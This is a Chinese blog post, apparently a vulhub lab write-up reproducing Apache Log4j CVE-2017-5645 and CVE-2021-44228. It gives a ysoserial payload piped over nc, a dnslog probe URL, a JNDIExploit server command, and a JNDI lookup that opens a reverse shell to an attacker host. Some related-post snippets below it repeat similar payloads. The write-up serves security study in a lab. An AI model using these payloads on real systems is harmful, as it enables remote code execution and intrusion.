vulhub漏洞复现九_log4j/2

最新推荐文章于 2024-06-17 17:31:24 发布
最新推荐文章于 2024-06-17 17:31:24 发布
阅读量1.9k 收藏 2
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122432709
版权

前言

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。

靶 机:192.168.4.10_ubuntu

攻击机:192.168.4.29_kali

一、 CVE-2017-5645_Apache Log4j Server 反序列化命令执行漏洞

漏洞原理

Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用

1. 环境搭建

#docker-compose up -d

环境启动后,将在4712端口开启一个TCPServer。

 

2. 使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

 

3. 查看容器/tmp,看见success创建成功

 #执行命令可换成shell

二、 CVE-2021-44228_Apache Log4j2 lookup JNDI 注入漏洞

漏洞原理

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

漏洞利用

1. 环境搭建

#docker-compose up -d

2. 漏洞测试

构造数据包dnslog测试

http://192.168.4.10:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.w7ssag.dnslog.cn}

 

存在漏洞

3. 中转机vps环境构建

使用工具exp:Log4j-exp

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.4.29

4. 启动监听

nc -lvvp 6666

5. 反弹shell

http://192.168.4.10:8983/solr/admin/cores?action=${jndi:ldap://192.168.4.29:1389/Basic/ReverseShell/192.168.4.29/6666}

 

 

Revenge_scan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1471
LOG4J2(CVE-2021-44228)vulhub复现
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2419
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3603
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
Vulhub——Log4j、solr
最新发布
qq_55202378的博客
06-17 1122
同样需要先创建core,这次是在将。
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1233
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4279
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
ArcGIS漏洞修补工具(Log4J
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
log4j_tutorial.rar_log4j java
09-24
四、Log4j的高级特性 1. **日志级别动态调整**: 在运行时,可以通过重新加载配置文件或API接口来改变日志级别,无需重启应用。 2. **MDC(Mapped Diagnostic Context)与NDC(Nested Diagnostic Context)**: 提供...
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2820
vulhubLog4j2:CVE-2021-44228漏洞复现
vulhublog4j
haoaaao的博客
05-02 1308
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
vulhubapache log4j2(CVE-2021-44228)漏洞复现
weixin_48739941的博客
04-11 1349
(1)原理:Apache Log4j 2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。该漏洞一旦被攻击者利用会造成严重危害。 (2)cd vulhub/log4j/CVE-2021-44228 切换目录。 (3)docker-compose up -d 启动。 访问:http://
vulhub环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-14 8034
Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件,开发框架与Web应用中。Apache Log4j2组件中存在一个远程代码执行漏洞(CVE-2021-44832)。本文讲解如何搭建vulhub靶场并在vulhub环境中复现漏洞以及反弹shell的操作。
Log4j2简单复现-前期
weixin_44844556的博客
12-20 1643
Log4j2复现log4j、log2
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ { expires 30d; error_log /dev/null; access_log /dev/null; } location ~ .*\.(js|css)?$ { expires 12h; error_log /dev/null; access_log /dev/null; }
06-06
这是一个 Nginx 的配置文件,用于设置静态文件的缓存时间和日志记录。第一个 location 匹配的是图片和动画文件,设置缓存时间为 30 天,同时关闭错误日志和访问日志;第二个 location 匹配的是 JavaScript 和 CSS ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值